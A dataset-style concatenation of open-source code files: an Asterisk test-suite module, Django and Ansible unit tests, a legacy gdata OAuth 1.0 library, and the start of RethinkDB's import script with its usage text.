#ami.originate has no type var, so action['type'] has to be popped
action.pop('type')
action['variable'] = {'SOUNDFILE': energyfile}
ami.registerEvent("UserEvent", self.verify_presence)
dfr = ami.originate(**action)
dfr.addErrback(self.test_object.handle_originate_failure)
def sound_check_actions(self, ami):
"""The second, usually larger part of the sound check.
Iterates through the actions that will be used to check various
aspects of the given sound file. Waits for the output of the action
functions before continuing. If all actions have been completed resets
the test to register for a new event as defined in the triggers. If
all sound-file tests have been finished, sets the test to passed.
Keyword Arguments:
ami- the AMI instance used by this test
"""
if self.action_index == len(self.actions):
self.action_index = 0
self.index += 1
if self.index == len(self.module_config):
LOGGER.info("Test successfully passed")
self.test_object.set_passed(True)
if self.auto_stop:
self.test_object.stop_reactor()
else:
self.event_register(ami)
else:
actiontype = self.actions[self.action_index]['type']
if actiontype == 'size_check':
self.size_check(ami)
elif actiontype == 'energy_check':
self.energy_check(ami)
def verify_presence(self, ami, event):
"""UserEvent verifier for the energy check.
Verifies that the userevent that was given off by the dialplan
extension called in energy_check was a soundcheck userevent and that
the status is pass. Fails if the status was not pass. Iterates
action_index if it passed so that the next action can be done.
Keyword Arguments:
ami- the AMI instance used by this test
event- the event (Userevent) being picked up by the AMI that
determines whether a correct amount of energy has been detected.
"""
userevent = event.get("userevent")
if not userevent:
return
if userevent.lower() != "soundcheck":
return
LOGGER.info("Checking the sound check userevent")
ami.deregisterEvent("UserEvent", self.verify_presence)
status = event.get("status")
LOGGER.debug("Status of the sound check is " + status)
if status != "pass":
LOGGER.error("The sound check wasn't successful- test failed")
self.test_object.set_passed(False)
if self.auto_stop:
self.test_object.stop_reactor()
return
else:
self.action_index += 1
self.sound_check_actions(ami)
def sound_check_start(self, ami, event):
"""The first part of the sound_check test. Required.
It deregisters the prerequisite event as defined in triggers so that
it doesn't keep looking for said events. Then it checks whether the
sound file described in the YAML exists by looking for the file with
the given path. The filepath is determined by calling
build_sound_file_location. After this initial part of sound_check,
the remaining actions are then called.
Keyword Arguments:
ami- the AMI instance used by this test
event- the event (defined by the triggers section) being picked up by
the AMI that allows the rest of the pluggable module to be accessed
"""
config = self.module_config[self.index]
instance_id = config.get('id', 0)
if ami.id != instance_id:
return
current_trigger = config['trigger']['match']
for key, value in current_trigger.items():
if key.lower() not in event:
LOGGER.debug("Condition %s not in event, returning", key)
return
if not re.match(value, event.get(key.lower())):
LOGGER.debug("Condition %s: %s does not match %s: %s in event",
key, value, key, event.get(key.lower()))
return
else:
LOGGER.debug("Condition %s: %s matches %s: %s in event",
key, value, key, event.get(key.lower()))
ami.deregisterEvent(current_trigger.get('event'),
self.sound_check_start)
self.sound_file = config['sound-file']
if not self.sound_file:
raise Exception("No sound file parameters specified")
if (not self.sound_file.get('file-name')
or not self.sound_file.get('file-path-type')):
raise Exception("No file or file path type specified")
if self.sound_file.get('absolute-path'):
file_name = self.sound_file['file-name']
file_path_type = self.sound_file['file-path-type']
absolute_path = self.sound_file['absolute-path']
self.filepath = self.build_sound_file_location(file_name,
file_path_type,
absolute_path)
else:
file_name = self.sound_file['file-name']
file_path_type = self.sound_file['file-path-type']
self.filepath = self.build_sound_file_location(file_name,
file_path_type)
#Find the filesize here if it exists
if not os.path.exists(self.filepath):
LOGGER.error("File '%s' does not exist!" % self.filepath)
self.test_object.set_passed(False)
if self.auto_stop:
self.test_object.stop_reactor()
return
self.actions = self.sound_file.get('actions')
self.sound_check_actions(ami)
def event_register(self, ami):
"""Event register for the prerequisite event.
Starts looking for the event defined in the triggers section of the
YAML that allows the rest of the test to be accessed.
Keyword Arguments:
ami- the AMI instance used by this test
"""
current_trigger = self.module_config[self.index]['trigger']['match']
trigger_id = self.module_config[self.index]['trigger'].get('id', 0)
if ami.id != trigger_id:
return
if not current_trigger:
raise Exception("Missing a trigger")
else:
ami.registerEvent(current_trigger.get('event'),
self.sound_check_start)
def ami_connect(self, ami):
"""Starts the ami_connection and then calls event_register
Keyword Arguments:
ami- the AMI instance used by this test
"""
self.event_register(ami)
class AsteriskConfigModule(object):
"""A pluggable module that installs an Asterisk config file.
Configuration is as follows:
config-section:
-
id: 0
src: tests/my-test/my-super-awesome.conf
dst: extensions.conf
"""
def __init__(self, instance_config, test_object):
"""Constructor for pluggable modules"""
super(AsteriskConfigModule, self).__init__()
for info in instance_config:
asterisk_instance = test_object.ast[info.get('id', 0)]
asterisk_instance.install_config(info['src'], info['dst'])
class FastAGIModule(object):
"""A class that makes a FastAGI server available to be called via the
dialplan and allows simple commands to be executed.
Configuration is as follows:
config-section:
host: '127.0.0.1'
port: 4573
commands:
- 'SET VARIABLE "CHANVAR1" "CHANVAL1"'
Instead of commands, a callback may be specified to interact with Asterisk:
callback:
module: fast_agi_callback_module
method: fast_agi_callback_method
"""
def __init__(self, instance_config, test_object):
"""Constructor for pluggable modules"""
super(FastAGIModule, self).__init__()
self.test_object = test_object
self.port = instance_config.get('port', 4573)
self.host = instance_config.get('host', '127.0.0.1')
self.commands = instance_config.get('commands')
if 'callback' in instance_config:
self.callback_module = instance_config['callback']['module']
self.callback_method = instance_config['callback']['method']
fastagi_factory = fastagi.FastAGIFactory(self.fastagi_connect)
reactor.listenTCP(self.port, fastagi_factory,
test_object.reactor_timeout, self.host)
def fastagi_connect(self, agi):
"""Handle incoming connections"""
if self.commands:
return self.execute_command(agi, 0)
else:
method = load_and_parse_module(self.callback_module + '.' + self.callback_method)
method(self.test_object, agi)
def on_command_failure(self, reason, agi, idx):
"""Failure handler for executing commands"""
LOGGER.error('Could not execute command %s: %s',
idx, self.commands[idx])
LOGGER.error(reason.getTraceback())
agi.finish()
def on_command_success(self, result, agi, idx):
"""Handler for executing commands"""
LOGGER.debug("Successfully executed '%s': %s",
self.commands[idx], result)
self.execute_command(agi, idx + 1)
def execute_command(self, agi, idx):
"""Execute the requested command"""
if len(self.commands) <= idx:
LOGGER.debug("Completed all commands for %s:%s",
self.host, self.port)
agi.finish()
return
agi.sendCommand(self.commands[idx])\
.addCallback(self.on_command_success, agi, idx)\
.addErrback(self.on_command_failure, agi, idx)
class EventActionModule(object):
"""A class that links arbitrary events with one or more actions.
Configuration is as follows:
config-section:
actions:
custom-action-name: custom.action.location
events:
custom-event-name: custom.event.location
mapping:
-
custom-event-name:
event-config-goes-here
custom-action-name:
action-config-goes-here
Or if no locally-defined events or actions are desired:
config-section:
-
event-name:
event-config-goes-here
other-event-name:
event-config-goes-here
action-name:
action-config-goes-here
Or if no locally-defined events or actions are desired and only one set is
desired:
config-section:
event-name:
event-config-goes-here
action-name:
action-config-goes-here
Any event in a set will trigger all actions in a set.
"""
def __init__(self, instance_config, test_object):
"""Constructor for pluggable modules"""
super(EventActionModule, self).__init__()
self.test_object = test_object
config = instance_config
if isinstance(config, list):
config = {"mapping": config}
elif isinstance(config, dict) and "mapping" not in config:
config = {"mapping": [config]}
# Parse out local action and event definitions
self.local_action_registry = PluggableRegistry()
self.local_event_registry = PluggableRegistry()
def register_modules(config, registry):
"""Register pluggable modules into the registry"""
for key, local_class_path in config.items():
local_class = load_and_parse_module(local_class_path)
if not local_class:
raise Exception("Unable to load %s for module key %s"
% (local_class_path, key))
registry.register(key, local_class)
if "actions" in config:
register_modules(config["actions"], self.local_action_registry)
if "events" in config:
register_modules(config["events"], self.local_event_registry)
self.event_action_sets = []
self.parse_mapping(config)
def parse_mapping(self, config):
"""Parse out the mapping and instantiate objects."""
for e_a_set in config["mapping"]:
plug_set = {"events": [], "actions": []}
for plug_name, plug_config in e_a_set.items():
self.parse_module_config(plug_set, plug_name, plug_config)
if 0 == len(plug_set["events"]):
raise Exception("Pluggable set requires at least one event: %s"
% e_a_set)
self.event_action_sets.append(plug_set)
def parse_module_config(self, plug_set, plug_name, plug_config):
"""Parse module config and update the pluggable module set"""
if self.local_event_registry.check(plug_name):
plug_class = self.local_event_registry.get_class(plug_name)
plug_set["events"].append(
plug_class(self.test_object, self.event_triggered, plug_config))
elif self.local_action_registry.check(plug_name):
plug_class = self.local_action_registry.get_class(plug_name)
plug_set["actions"].append(
plug_class(self.test_object, plug_config))
elif PLUGGABLE_EVENT_REGISTRY.check(plug_name):
plug_class = PLUGGABLE_EVENT_REGISTRY.get_class(plug_name)
plug_set["events"].append(
plug_class(self.test_object, self.event_triggered, plug_config))
elif PLUGGABLE_ACTION_REGISTRY.check(plug_name):
plug_class = PLUGGABLE_ACTION_REGISTRY.get_class(plug_name)
plug_set["actions"].append(
plug_class(self.test_object, plug_config))
else:
raise Exception("Pluggable component '%s' not recognized"
% plug_name)
def find_triggered_set(self, triggered_by):
"""Find the set that was triggered."""
for e_a_set in self.event_action_sets:
for event_mod in e_a_set["events"]:
if event_mod == triggered_by:
return e_a_set
return None
def event_triggered(self, triggered_by, source=None, extra=None):
"""Run actions for the triggered set."""
triggered_set = self.find_triggered_set(triggered_by)
if not triggered_set:
raise Exception("Unable to find event/action set for %s"
% triggered_by)
for action_mod in triggered_set["actions"]:
action_mod.run(triggered_by, source, extra)
class TestStartEventModule(object):
"""An event module that triggers when the test starts."""
def __init__(self, test_object, triggered_callback, config):
"""Setup the test start observer"""
self.test_object = test_object
self.triggered_callback = triggered_callback
self.config = config
test_object.register_start_observer(self.start_observer)
def start_observer(self, ast):
"""Notify the event-action mapper that the test has started."""
self.triggered_callback(self, ast)
PLUGGABLE_EVENT_REGISTRY.register("test-start", TestStartEventModule)
class LogActionModule(object):
"""An action module that logs a message when triggered."""
def __init__(self, test_object, config):
"""Setup the test start observer"""
self.test_object = test_object
self.message = config["message"]
def run(self, triggered_by, source, extra):
"""Log a message."""
LOGGER.info(self.message)
PLUGGABLE_ACTION_REGISTRY.register("logger", LogActionModule)
class ValidateLogActionModule(object):
"""An action module that validates a log files existence."""
def __init__(self, test_object, config):
self.test_object = test_object
self.logfile = config["logfile"]
self.pass_if_present = config["pass-if-present"]
def run(self, triggered_by, source, extra):
"""Check to see if log file is present or not."""
files = []
testpath = ('%s/var/log/asterisk' %
(self.test_object.ast[0].base))
for (dirpath, dirnames, filenames) in os.walk(testpath):
files.extend(filenames)
break
if self.logfile in files:
if (self.pass_if_present):
self.test_object.set_passed(True)
else:
self.test_object.set_passed(False)
else:
if (self.pass_if_present):
self.test_object.set_passed(False)
else:
self.test_object.set_passed(True)
PLUGGABLE_ACTION_REGISTRY.register("validate-log", ValidateLogActionModule)
class CallbackActionModule(object):
"""An action module that calls the specified callback."""
def __init__(self, test_object, config):
"""Setup the test start observer"""
self.test_object = test_object
self.module = config["module"]
self.method = config["method"]
def run(self, triggered_by, source, extra):
"""Call the callback."""
method = load_and_parse_module(self.module + '.' + self.method)
self.test_object.set_passed(method(self.test_object, triggered_by,
source, extra))
PLUGGABLE_ACTION_REGISTRY.register("callback", CallbackActionModule)
class StopTestActionModule(object):
"""Action module that stops a test"""
def __init__(self, test_object, config):
"""Constructor
Keyword Arguments:
test_object The main test object
config The pluggable module config
"""
self.test_object = test_object
def run(self, triggered_by, source, extra):
"""Execute the action, which stops the test
Keyword Arguments:
triggered_by The event that triggered this action
source The Asterisk interface object that provided the event
extra Source dependent data
"""
self.test_object.stop_reactor()
PLUGGABLE_ACTION_REGISTRY.register("stop_test", StopTestActionModule)
class PjsuaPhoneActionModule(object):
"""An action module that instructs a phone to perform an action."""
def __init__(self, test_object, config):
"""Setup the test start observer"""
self.test_object = test_object
self.module = "phones"
self.method = config["action"]
self.config = config
def run(self, triggered_by, source, extra):
"""Instruct phone to perform action"""
method = load_and_parse_module(self.module + "." + self.method)
method(self.test_object, triggered_by, source, extra, self.config)
PLUGGABLE_ACTION_REGISTRY.register("pjsua_phone", PjsuaPhoneActionModule)
| gpl-2.0 |
etos/django | tests/forms_tests/tests/test_validators.py | 111 | 2210 | import re
from unittest import TestCase
from django import forms
from django.core import validators
from django.core.exceptions import ValidationError
class TestFieldWithValidators(TestCase):
def test_all_errors_get_reported(self):
class UserForm(forms.Form):
full_name = forms.CharField(
max_length=50,
validators=[
validators.validate_integer,
validators.validate_email,
]
)
string = forms.CharField(
max_length=50,
validators=[
validators.RegexValidator(
regex='^[a-zA-Z]*$',
message="Letters only.",
)
]
)
ignore_case_string = forms.CharField(
max_length=50,
validators=[
validators.RegexValidator(
regex='^[a-z]*$',
message="Letters only.",
flags=re.IGNORECASE,
)
]
)
form = UserForm({
'full_name': 'not int nor mail',
'string': '2 is not correct',
'ignore_case_string': "IgnORE Case strIng",
})
with self.assertRaises(ValidationError) as e:
form.fields['full_name'].clean('not int nor mail')
self.assertEqual(2, len(e.exception.messages))
self.assertFalse(form.is_valid())
self.assertEqual(form.errors['string'], ["Letters only."])
self.assertEqual(form.errors['string'], ["Letters only."])
def test_field_validators_can_be_any_iterable(self):
class UserForm(forms.Form):
full_name = forms.CharField(
max_length=50,
validators=(
validators.validate_integer,
validators.validate_email,
)
)
form = UserForm({'full_name': 'not int nor mail'})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors['full_name'], ['Enter a valid integer.', 'Enter a valid email address.'])
| bsd-3-clause |
hyperized/ansible | test/units/modules/network/netvisor/test_pn_vrouter_interface_ip.py | 23 | 2787 | # Copyright: (c) 2018, Pluribus Networks
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat.mock import patch
from ansible.modules.network.netvisor import pn_vrouter_interface_ip
from units.modules.utils import set_module_args
from .nvos_module import TestNvosModule
class TestVrouterInterfaceIpModule(TestNvosModule):
module = pn_vrouter_interface_ip
def setUp(self):
self.mock_run_nvos_commands = patch('ansible.modules.network.netvisor.pn_vrouter_interface_ip.run_cli')
self.run_nvos_commands = self.mock_run_nvos_commands.start()
self.mock_run_check_cli = patch('ansible.modules.network.netvisor.pn_vrouter_interface_ip.check_cli')
self.run_check_cli = self.mock_run_check_cli.start()
def tearDown(self):
self.mock_run_nvos_commands.stop()
self.mock_run_check_cli.stop()
def run_cli_patch(self, module, cli, state_map):
if state_map['present'] == 'vrouter-interface-ip-add':
results = dict(
changed=True,
cli_cmd=cli
)
elif state_map['absent'] == 'vrouter-interface-ip-remove':
results = dict(
changed=True,
cli_cmd=cli
)
module.exit_json(**results)
def load_fixtures(self, commands=None, state=None, transport='cli'):
self.run_nvos_commands.side_effect = self.run_cli_patch
if state == 'present':
self.run_check_cli.return_value = True, False, True
if state == 'absent':
self.run_check_cli.return_value = True, True, True
def test_vrouter_interface_ip_add(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_vrouter_name': 'foo-vrouter',
'pn_ip': '2620:0:1651:1::30', 'pn_netmask': '127', 'pn_nic': 'eth0.4092', 'state': 'present'})
result = self.execute_module(changed=True, state='present')
expected_cmd = ' switch sw01 vrouter-interface-ip-add vrouter-name foo-vrouter nic eth0.4092 '
expected_cmd += 'ip 2620:0:1651:1::30 netmask 127'
self.assertEqual(result['cli_cmd'], expected_cmd)
def test_vrouter_interface_ip_remove(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_vrouter_name': 'foo-vrouter',
'pn_ip': '2620:0:1651:1::30', 'pn_nic': 'eth0.4092', 'state': 'absent'})
result = self.execute_module(changed=True, state='absent')
expected_cmd = ' switch sw01 vrouter-interface-ip-remove vrouter-name foo-vrouter nic eth0.4092 '
expected_cmd += 'ip 2620:0:1651:1::30 '
self.assertEqual(result['cli_cmd'], expected_cmd)
| gpl-3.0 |
dya2/python-for-android | python-build/python-libs/gdata/src/gdata/oauth/__init__.py | 157 | 19407 | import cgi
import urllib
import time
import random
import urlparse
import hmac
import binascii
VERSION = '1.0' # Hi Blaine!
HTTP_METHOD = 'GET'
SIGNATURE_METHOD = 'PLAINTEXT'
# Generic exception class
class OAuthError(RuntimeError):
def __init__(self, message='OAuth error occured.'):
self.message = message
# optional WWW-Authenticate header (401 error)
def build_authenticate_header(realm=''):
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
# url escape
def escape(s):
# escape '/' too
return urllib.quote(s, safe='~')
# util function: current timestamp
# seconds since epoch (UTC)
def generate_timestamp():
return int(time.time())
# util function: nonce
# pseudorandom number
def generate_nonce(length=8):
return ''.join([str(random.randint(0, 9)) for i in range(length)])
# OAuthConsumer is a data type that represents the identity of the Consumer
# via its shared secret with the Service Provider.
class OAuthConsumer(object):
key = None
secret = None
def __init__(self, key, secret):
self.key = key
self.secret = secret
# OAuthToken is a data type that represents an End User via either an access
# or request token.
class OAuthToken(object):
# access tokens and request tokens
key = None
secret = None
'''
key = the token
secret = the token secret
'''
def __init__(self, key, secret):
self.key = key
self.secret = secret
def to_string(self):
return urllib.urlencode({'oauth_token': self.key, 'oauth_token_secret': self.secret})
# return a token from something like:
# oauth_token_secret=digg&oauth_token=digg
def from_string(s):
params = cgi.parse_qs(s, keep_blank_values=False)
key = params['oauth_token'][0]
secret = params['oauth_token_secret'][0]
return OAuthToken(key, secret)
from_string = staticmethod(from_string)
def __str__(self):
return self.to_string()
# OAuthRequest represents the request and can be serialized
class OAuthRequest(object):
'''
OAuth parameters:
- oauth_consumer_key
- oauth_token
- oauth_signature_method
- oauth_signature
- oauth_timestamp
- oauth_nonce
- oauth_version
... any additional parameters, as defined by the Service Provider.
'''
parameters = None # oauth parameters
http_method = HTTP_METHOD
http_url = None
version = VERSION
def __init__(self, http_method=HTTP_METHOD, http_url=None, parameters=None):
self.http_method = http_method
self.http_url = http_url
self.parameters = parameters or {}
def set_parameter(self, parameter, value):
self.parameters[parameter] = value
def get_parameter(self, parameter):
try:
return self.parameters[parameter]
except:
raise OAuthError('Parameter not found: %s' % parameter)
def _get_timestamp_nonce(self):
return self.get_parameter('oauth_timestamp'), self.get_parameter('oauth_nonce')
# get any non-oauth parameters
def get_nonoauth_parameters(self):
parameters = {}
for k, v in self.parameters.iteritems():
# ignore oauth parameters
if k.find('oauth_') < 0:
parameters[k] = v
return parameters
# serialize as a header for an HTTPAuth request
def to_header(self, realm=''):
auth_header = 'OAuth realm="%s"' % realm
# add the oauth parameters
if self.parameters:
for k, v in self.parameters.iteritems():
if k[:6] == 'oauth_':
auth_header += ', %s="%s"' % (k, escape(str(v)))
return {'Authorization': auth_header}
# serialize as post data for a POST request
def to_postdata(self):
return '&'.join(['%s=%s' % (escape(str(k)), escape(str(v))) for k, v in self.parameters.iteritems()])
# serialize as a url for a GET request
def to_url(self):
return '%s?%s' % (self.get_normalized_http_url(), self.to_postdata())
# return a string that consists of all the parameters that need to be signed
def get_normalized_parameters(self):
params = self.parameters
try:
# exclude the signature if it exists
del params['oauth_signature']
except:
pass
key_values = params.items()
# sort lexicographically, first after key, then after value
key_values.sort()
# combine key value pairs in string and escape
return '&'.join(['%s=%s' % (escape(str(k)), escape(str(v))) for k, v in key_values])
# just uppercases the http method
def get_normalized_http_method(self):
return self.http_method.upper()
# parses the url and rebuilds it to be scheme://host/path
def get_normalized_http_url(self):
parts = urlparse.urlparse(self.http_url)
url_string = '%s://%s%s' % (parts[0], parts[1], parts[2]) # scheme, netloc, path
return url_string
# set the signature parameter to the result of build_signature
def sign_request(self, signature_method, consumer, token):
# set the signature method
self.set_parameter('oauth_signature_method', signature_method.get_name())
# set the signature
self.set_parameter('oauth_signature', self.build_signature(signature_method, consumer, token))
def build_signature(self, signature_method, consumer, token):
# call the build signature method within the signature method
return signature_method.build_signature(self, consumer, token)
def from_request(http_method, http_url, headers=None, parameters=None, query_string=None):
# combine multiple parameter sources
if parameters is None:
parameters = {}
# headers
if headers and 'Authorization' in headers:
auth_header = headers['Authorization']
# check that the authorization header is OAuth
if auth_header.index('OAuth') > -1:
try:
# get the parameters from the header
header_params = OAuthRequest._split_header(auth_header)
parameters.update(header_params)
except:
raise OAuthError('Unable to parse OAuth parameters from Authorization header.')
# GET or POST query string
if query_string:
query_params = OAuthRequest._split_url_string(query_string)
parameters.update(query_params)
# URL parameters
param_str = urlparse.urlparse(http_url)[4] # query
url_params = OAuthRequest._split_url_string(param_str)
parameters.update(url_params)
if parameters:
return OAuthRequest(http_method, http_url, parameters)
return None
from_request = staticmethod(from_request)
def from_consumer_and_token(oauth_consumer, token=None, http_method=HTTP_METHOD, http_url=None, parameters=None):
if not parameters:
parameters = {}
defaults = {
'oauth_consumer_key': oauth_consumer.key,
'oauth_timestamp': generate_timestamp(),
'oauth_nonce': generate_nonce(),
'oauth_version': OAuthRequest.version,
}
defaults.update(parameters)
parameters = defaults
if token:
parameters['oauth_token'] = token.key
return OAuthRequest(http_method, http_url, parameters)
from_consumer_and_token = staticmethod(from_consumer_and_token)
def from_token_and_callback(token, callback=None, http_method=HTTP_METHOD, http_url=None, parameters=None):
if not parameters:
parameters = {}
parameters['oauth_token'] = token.key
if callback:
parameters['oauth_callback'] = callback
return OAuthRequest(http_method, http_url, parameters)
from_token_and_callback = staticmethod(from_token_and_callback)
# util function: turn Authorization: header into parameters, has to do some unescaping
def _split_header(header):
params = {}
parts = header.split(',')
for param in parts:
# ignore realm parameter
if param.find('OAuth realm') > -1:
continue
# remove whitespace
param = param.strip()
# split key-value
param_parts = param.split('=', 1)
# remove quotes and unescape the value
params[param_parts[0]] = urllib.unquote(param_parts[1].strip('\"'))
return params
_split_header = staticmethod(_split_header)
# util function: turn url string into parameters, has to do some unescaping
def _split_url_string(param_str):
parameters = cgi.parse_qs(param_str, keep_blank_values=False)
for k, v in parameters.iteritems():
parameters[k] = urllib.unquote(v[0])
return parameters
_split_url_string = staticmethod(_split_url_string)
# OAuthServer is a worker to check a requests validity against a data store
class OAuthServer(object):
timestamp_threshold = 300 # in seconds, five minutes
version = VERSION
signature_methods = None
data_store = None
def __init__(self, data_store=None, signature_methods=None):
self.data_store = data_store
self.signature_methods = signature_methods or {}
def set_data_store(self, oauth_data_store):
self.data_store = data_store
def get_data_store(self):
return self.data_store
def add_signature_method(self, signature_method):
self.signature_methods[signature_method.get_name()] = signature_method
return self.signature_methods
# process a request_token request
# returns the request token on success
def fetch_request_token(self, oauth_request):
try:
# get the request token for authorization
token = self._get_token(oauth_request, 'request')
except OAuthError:
# no token required for the initial token request
version = self._get_version(oauth_request)
consumer = self._get_consumer(oauth_request)
self._check_signature(oauth_request, consumer, None)
# fetch a new token
token = self.data_store.fetch_request_token(consumer)
return token
# process an access_token request
# returns the access token on success
def fetch_access_token(self, oauth_request):
version = self._get_version(oauth_request)
consumer = self._get_consumer(oauth_request)
# get the request token
token = self._get_token(oauth_request, 'request')
self._check_signature(oauth_request, consumer, token)
new_token = self.data_store.fetch_access_token(consumer, token)
return new_token
# verify an api call, checks all the parameters
def verify_request(self, oauth_request):
# -> consumer and token
version = self._get_version(oauth_request)
consumer = self._get_consumer(oauth_request)
# get the access token
token = self._get_token(oauth_request, 'access')
self._check_signature(oauth_request, consumer, token)
parameters = oauth_request.get_nonoauth_parameters()
return consumer, token, parameters
# authorize a request token
def authorize_token(self, token, user):
return self.data_store.authorize_request_token(token, user)
# get the callback url
def get_callback(self, oauth_request):
return oauth_request.get_parameter('oauth_callback')
# optional support for the authenticate header
def build_authenticate_header(self, realm=''):
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
# verify the correct version request for this server
def _get_version(self, oauth_request):
try:
version = oauth_request.get_parameter('oauth_version')
except:
version = VERSION
if version and version != self.version:
raise OAuthError('OAuth version %s not supported.' % str(version))
return version
# figure out the signature with some defaults
def _get_signature_method(self, oauth_request):
try:
signature_method = oauth_request.get_parameter('oauth_signature_method')
except:
signature_method = SIGNATURE_METHOD
try:
# get the signature method object
signature_method = self.signature_methods[signature_method]
except:
signature_method_names = ', '.join(self.signature_methods.keys())
raise OAuthError('Signature method %s not supported try one of the following: %s' % (signature_method, signature_method_names))
return signature_method
def _get_consumer(self, oauth_request):
consumer_key = oauth_request.get_parameter('oauth_consumer_key')
if not consumer_key:
raise OAuthError('Invalid consumer key.')
consumer = self.data_store.lookup_consumer(consumer_key)
if not consumer:
raise OAuthError('Invalid consumer.')
return consumer
# try to find the token for the provided request token key
def _get_token(self, oauth_request, token_type='access'):
token_field = oauth_request.get_parameter('oauth_token')
token = self.data_store.lookup_token(token_type, token_field)
if not token:
raise OAuthError('Invalid %s token: %s' % (token_type, token_field))
return token
def _check_signature(self, oauth_request, consumer, token):
timestamp, nonce = oauth_request._get_timestamp_nonce()
self._check_timestamp(timestamp)
self._check_nonce(consumer, token, nonce)
signature_method = self._get_signature_method(oauth_request)
try:
signature = oauth_request.get_parameter('oauth_signature')
except:
raise OAuthError('Missing signature.')
# validate the signature
valid_sig = signature_method.check_signature(oauth_request, consumer, token, signature)
if not valid_sig:
key, base = signature_method.build_signature_base_string(oauth_request, consumer, token)
raise OAuthError('Invalid signature. Expected signature base string: %s' % base)
built = signature_method.build_signature(oauth_request, consumer, token)
def _check_timestamp(self, timestamp):
# verify that timestamp is recentish
timestamp = int(timestamp)
now = int(time.time())
lapsed = now - timestamp
if lapsed > self.timestamp_threshold:
raise OAuthError('Expired timestamp: given %d and now %s has a greater difference than threshold %d' % (timestamp, now, self.timestamp_threshold))
def _check_nonce(self, consumer, token, nonce):
# verify that the nonce is uniqueish
nonce = self.data_store.lookup_nonce(consumer, token, nonce)
if nonce:
raise OAuthError('Nonce already used: %s' % str(nonce))
# OAuthClient is a worker to attempt to execute a request
class OAuthClient(object):
consumer = None
token = None
def __init__(self, oauth_consumer, oauth_token):
self.consumer = oauth_consumer
self.token = oauth_token
def get_consumer(self):
return self.consumer
def get_token(self):
return self.token
def fetch_request_token(self, oauth_request):
# -> OAuthToken
raise NotImplementedError
def fetch_access_token(self, oauth_request):
# -> OAuthToken
raise NotImplementedError
def access_resource(self, oauth_request):
# -> some protected resource
raise NotImplementedError
# OAuthDataStore is a database abstraction used to lookup consumers and tokens
class OAuthDataStore(object):
def lookup_consumer(self, key):
# -> OAuthConsumer
raise NotImplementedError
def lookup_token(self, oauth_consumer, token_type, token_token):
# -> OAuthToken
raise NotImplementedError
def lookup_nonce(self, oauth_consumer, oauth_token, nonce, timestamp):
# -> OAuthToken
raise NotImplementedError
def fetch_request_token(self, oauth_consumer):
# -> OAuthToken
raise NotImplementedError
def fetch_access_token(self, oauth_consumer, oauth_token):
# -> OAuthToken
raise NotImplementedError
def authorize_request_token(self, oauth_token, user):
# -> OAuthToken
raise NotImplementedError
# OAuthSignatureMethod is a strategy class that implements a signature method
class OAuthSignatureMethod(object):
def get_name(self):
# -> str
raise NotImplementedError
def build_signature_base_string(self, oauth_request, oauth_consumer, oauth_token):
# -> str key, str raw
raise NotImplementedError
def build_signature(self, oauth_request, oauth_consumer, oauth_token):
# -> str
raise NotImplementedError
def check_signature(self, oauth_request, consumer, token, signature):
built = self.build_signature(oauth_request, consumer, token)
return built == signature
class OAuthSignatureMethod_HMAC_SHA1(OAuthSignatureMethod):
def get_name(self):
return 'HMAC-SHA1'
def build_signature_base_string(self, oauth_request, consumer, token):
sig = (
escape(oauth_request.get_normalized_http_method()),
escape(oauth_request.get_normalized_http_url()),
escape(oauth_request.get_normalized_parameters()),
)
key = '%s&' % escape(consumer.secret)
if token:
key += escape(token.secret)
raw = '&'.join(sig)
return key, raw
def build_signature(self, oauth_request, consumer, token):
# build the base signature string
key, raw = self.build_signature_base_string(oauth_request, consumer, token)
# hmac object
try:
import hashlib # 2.5
hashed = hmac.new(key, raw, hashlib.sha1)
except:
import sha # deprecated
hashed = hmac.new(key, raw, sha)
# calculate the digest base 64
return binascii.b2a_base64(hashed.digest())[:-1]
class OAuthSignatureMethod_PLAINTEXT(OAuthSignatureMethod):
def get_name(self):
return 'PLAINTEXT'
def build_signature_base_string(self, oauth_request, consumer, token):
# concatenate the consumer key and secret
sig = escape(consumer.secret) + '&'
if token:
sig = sig + escape(token.secret)
return sig
def build_signature(self, oauth_request, consumer, token):
return self.build_signature_base_string(oauth_request, consumer, token)
| apache-2.0 |
tempbottle/rethinkdb | drivers/python/rethinkdb/_import.py | 9 | 39332 | #!/usr/bin/env python
from __future__ import print_function
import signal
import sys, os, datetime, time, json, traceback, csv
import multiprocessing, multiprocessing.queues, subprocess, re, ctypes, codecs
from optparse import OptionParser
from ._backup import *
import rethinkdb as r
# Used because of API differences in the csv module, taken from
# http://python3porting.com/problems.html
PY3 = sys.version > '3'
#json parameters
json_read_chunk_size = 32 * 1024
json_max_buffer_size = 128 * 1024 * 1024
try:
import cPickle as pickle
except ImportError:
import pickle
try:
from itertools import imap
except ImportError:
imap = map
try:
xrange
except NameError:
xrange = range
try:
from multiprocessing import SimpleQueue
except ImportError:
from multiprocessing.queues import SimpleQueue
info = "'rethinkdb import` loads data into a RethinkDB cluster"
usage = "\
rethinkdb import -d DIR [-c HOST:PORT] [-a AUTH_KEY] [--force]\n\
[-i (DB | DB.TABLE)] [--clients NUM]\n\
rethinkdb import -f FILE --table DB.TABLE [-c HOST:PORT] [-a AUTH_KEY]\n\
[--force] [--clients NUM] [--format (csv | json)] [--pkey PRIMARY_KEY]\n\
[--delimiter CHARACTER] [--custom-header FIELD,FIELD... [--no-header]]"
def print_import_help():
print(info)
print(usage)
print("")
print(" -h [ --help ] print this help")
print(" -c [ --connect ] HOST:PORT host and client port of a rethinkdb node to connect")
print(" to (defaults to localhost:28015)")
print(" -a [ --auth ] AUTH_KEY authorization key for rethinkdb clients")
print(" --clients NUM_CLIENTS the number of client connections to use (defaults")
print(" to 8)")
print(" --hard-durability use hard durability writes (slower, but less memory")
print(" consumption on the server)")
print(" --force import data even if a table already exists, and")
print(" overwrite duplicate primary keys")
print(" --fields limit which fields to use when importing one table")
print("")
print("Import directory:")
print(" -d [ --directory ] DIR the directory to import data from")
print(" -i [ --import ] (DB | DB.TABLE) limit restore to the given database or table (may")
print(" be specified multiple times)")
print(" --no-secondary-indexes do not create secondary indexes for the imported tables")
print("")
print("Import file:")
print(" -f [ --file ] FILE the file to import data from")
